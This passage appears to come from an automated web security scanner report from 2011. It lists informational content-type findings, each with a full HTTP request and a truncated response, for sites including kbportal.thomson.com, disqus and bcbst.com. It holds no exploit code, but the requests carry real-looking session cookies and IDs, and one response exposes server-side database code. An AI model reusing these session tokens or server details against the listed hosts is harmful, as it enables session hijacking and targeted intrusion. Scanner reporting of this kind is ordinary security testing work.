<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title></title>
</head>
<body class="NoPad bgColor3">
   <script src="/js/default.js" type="text/javascript"></script>
...[SNIP]...

28.15. http://kbportal.thomson.com/display/2/leftframe_files/_greybar.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/leftframe_files/_greybar.html

Request

GET /display/2/leftframe_files/_greybar.html HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_leftframe.aspx?tab=browse&searchstring=&searchtype=&searchby=&cat=&catURL=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 2332
Content-Type: text/html
Last-Modified: Thu, 19 Nov 2009 09:29:54 GMT
Accept-Ranges: bytes
ETag: "015e1d9fa68ca1:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:05:11 GMT

<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!------------------------------
...[SNIP]...

28.16. http://kbportal.thomson.com/pc/12/categoryList/21/2/cat_index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /pc/12/categoryList/21/2/cat_index.html

Request

GET /pc/12/categoryList/21/2/cat_index.html?r=0.8968658 HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_leftframe.aspx?tab=browse&searchstring=&searchtype=&searchby=&cat=&catURL=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 1971
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 20:05:11 GMT
Accept-Ranges: bytes
ETag: W/"8e958c3f4d4cc1:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:05:11 GMT

...<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<META NAME="Con
...[SNIP]...

28.17. http://kbportal.thomson.com/pc/12/categoryList/88/2/cat_index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /pc/12/categoryList/88/2/cat_index.html

Request

GET /pc/12/categoryList/88/2/cat_index.html?r=0.6665606 HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_leftframe.aspx?tab=search&searchstring=&searchtype=&searchby=&cat=&catURL=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419burp; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=%5B%5BB%5D%5D; s_ppv=100; ASP.NET_SessionId=wmip5h2o1slpk445xan1ev45; BIGipServerKB-80=2240234663.20480.0000; LangCode=en-US; LangId=1; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 1000
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 20:51:31 GMT
Accept-Ranges: bytes
ETag: W/"44aaf7b8534cc1:28d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:51:33 GMT

...<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<META NAME="Con
...[SNIP]...

28.18. http://mediacdn.disqus.com/1303851120/build/system/def.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1303851120/build/system/def.html

Request

GET /1303851120/build/system/def.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1303613708.3.3.utmcsr=star-telegram.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/04/23/3022014/your-smartphone-knows-where-youve.html; __utma=113869458.1602204697.1303349184.1303525739.1303613708.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 26 Apr 2011 21:20:22 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2370951317
Cache-Control: max-age=2590927
Expires: Thu, 26 May 2011 21:32:36 GMT
Date: Tue, 26 Apr 2011 21:50:29 GMT
Connection: close
Content-Length: 26513

<!DOCTYPE html>

<html>
<script>
document.domain = 'disqus.com';

var urls = {
sigma: "http://sigma.disqus.com/sigma.html",
xdm: "http://mediacdn.disqus.com/1303851120/html/xdm
...[SNIP]...

28.19. http://mediacdn.disqus.com/1303851120/build/system/reply.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1303851120/build/system/reply.html

Request

GET /1303851120/build/system/reply.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1303613708.3.3.utmcsr=star-telegram.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/04/23/3022014/your-smartphone-knows-where-youve.html; __utma=113869458.1602204697.1303349184.1303525739.1303613708.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 26 Apr 2011 21:20:14 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2370935201
Cache-Control: max-age=2590832
Expires: Thu, 26 May 2011 21:31:10 GMT
Date: Tue, 26 Apr 2011 21:50:38 GMT
Connection: close
Content-Length: 19046


<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title></title>


<style type="text/css">
html,body,div,span,applet,object,iframe,h1,h2,h3,h
...[SNIP]...

28.20. http://mediacdn.disqus.com/1303851120/build/system/upload.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1303851120/build/system/upload.html

Request

GET /1303851120/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1303613708.3.3.utmcsr=star-telegram.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/04/23/3022014/your-smartphone-knows-where-youve.html; __utma=113869458.1602204697.1303349184.1303525739.1303613708.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 26 Apr 2011 21:20:15 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2370935218
Cache-Control: max-age=2591000
Expires: Thu, 26 May 2011 21:34:00 GMT
Date: Tue, 26 Apr 2011 21:50:40 GMT
Connection: close
Content-Length: 13024

<html>
<head>
<meta charset="utf-8">
<title></title>


<style type="text/css">
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,a
...[SNIP]...

28.21. http://moxieinsight.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moxieinsight.com
Path:   /

Request

GET /?xd_receiver=1 HTTP/1.1
Host: moxieinsight.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=2c9e5bbe7f56d18fa0b9532bc94c9016&extern=0&channel=http%3A%2F%2Fmoxieinsight.com%2F%3Fxd_receiver%3D1&locale=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b3edcdb4805ead0868b6a622ed5ae73; __utmz=156098471.1303851459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=156098471.878146381.1303851459.1303851459.1303851459.1; __utmc=156098471; __utmb=156098471.2.10.1303851459

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:07:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Content-Length: 324
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<scr
...[SNIP]...

28.22. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=892&ref2=elqNone&tzo=360&ms=259 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:59:11 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

28.23. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=3&product_key=testandtarget&billboard_type=productoverview&mbox=productpage_feature&mboxId=0&mboxTime=1303832135529&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 Generated error
Date: Tue, 26 Apr 2011 20:44:47 GMT
Connection: close
Content-Type: text/html

// ERROR: application server timeout.
if (mboxVersion >= 33) {
mboxFactories.get('default').getMboxes().each(function(m){m.setOffer(new mboxOfferDefault()).loaded();});
} else if (mboxVersion >= 31)
...[SNIP]...

28.24. http://recs.richrelevance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pvihc=b73.1303848202747.21158348%7C; pendprch=b73.1303848210023.%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D.24512906%7C; uc=525826ce-e29a-4f38-4315-024be4d0c771

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Tue, 26 Apr 2011 20:59:41 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...

28.25. http://support.moxiesoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.moxiesoft.com
Path:   /

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:01:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Tue, 26 Apr 2011 21:01:06 GMT
Set-Cookie: ASPSESSIONIDQABACBCB=NHEPJGDDIMDAFCDMFDDMALJF; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...

28.26. http://video.od.visiblemeasures.com/log  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.od.visiblemeasures.com
Path:   /log

Request

GET /log?feature=B&key=en-us_7c3add9fb5336e1f8e00000000&randomId=1548745391&ts=1303825648421&user=EEBCC0E18CB766C4B61693A8DA056D476384FA08&objectId=1303825648424%3a0&ct=1303825648424 HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 26 Apr 2011 18:47:37 GMT
Content-Type: text/html
Content-Length: 11
Last-Modified: Thu, 24 Feb 2011 07:58:25 GMT
X-Cnection: close
Accept-Ranges: bytes

objectid=1

28.27. http://view.c3metrics.com/v.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Request

GET /v.js?id=drive&cid=480&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/110247222/direct;;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:45:29 GMT
Last-Modified: Tue, 26 Apr 2011 18:40:38 GMT
Server: ECS (dca/533E)
X-Cache: HIT
Content-Length: 2413

/*
* C3 Metrics
* Copyright (c) C3 Metrics (www.c3metrics.com) All Right Reserved
*
* Last Updated: 2011-02-28 09:29:00
*/
var c3VJSurl="http://view.c3metrics.com/v.js";var c3VJSflurl="htt
...[SNIP]...

28.28. http://wd.sharethis.com/api/getApi.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getApi.php

Request

GET /api/getApi.php?return=json&url=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&fpc=8f316ea-12f93c9a01d-4bc8d0c8-1&cb=initWidgetOnSuccess&service=initWidget HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.1f60cca3a67f69342fce2ed55af68ca9.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1; __uset=yes

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:52:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 112

initWidgetOnSuccess({"status":"SUCCESS","data":{"session_token":"d1b7312256202cf8a161dc55717ba8b1","ga":true}});

28.29. http://www.bcbst.com/inc/loginform.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /inc/loginform.asp

Request

GET /inc/loginform.asp?t=0.5000415733084083 HTTP/1.1
Host: www.bcbst.com
Proxy-Connection: keep-alive
Referer: http://www.bcbst.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:37:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 837
Content-Type: text/html
Cache-control: private
Content-Length: 837


<script>

</script>
<div>
<form name="mainlogon"
       method="post"
       action="/signon/processlogon.do">
   <div class="user">
       <label>User ID:</label>
       <input name="dnqualifier"
           type="text
...[SNIP]...

28.30. https://www.bcbst.com/inc/loginform.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /inc/loginform.asp

Request

GET /inc/loginform.asp?t=0.3263980813790113 HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: https://www.bcbst.com/secure/public/login.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:26:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 837
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD; path=/
Cache-control: private
Content-Length: 837


<script>

</script>
<div>
<form name="mainlogon"
       method="post"
       action="/signon/processlogon.do">
   <div class="user">
       <label>User ID:</label>
       <input name="dnqualifier"
           type="text
...[SNIP]...

29. Content type incorrectly stated  previous  next
There are 72 instances of this issue:


29.1. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVHP1&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
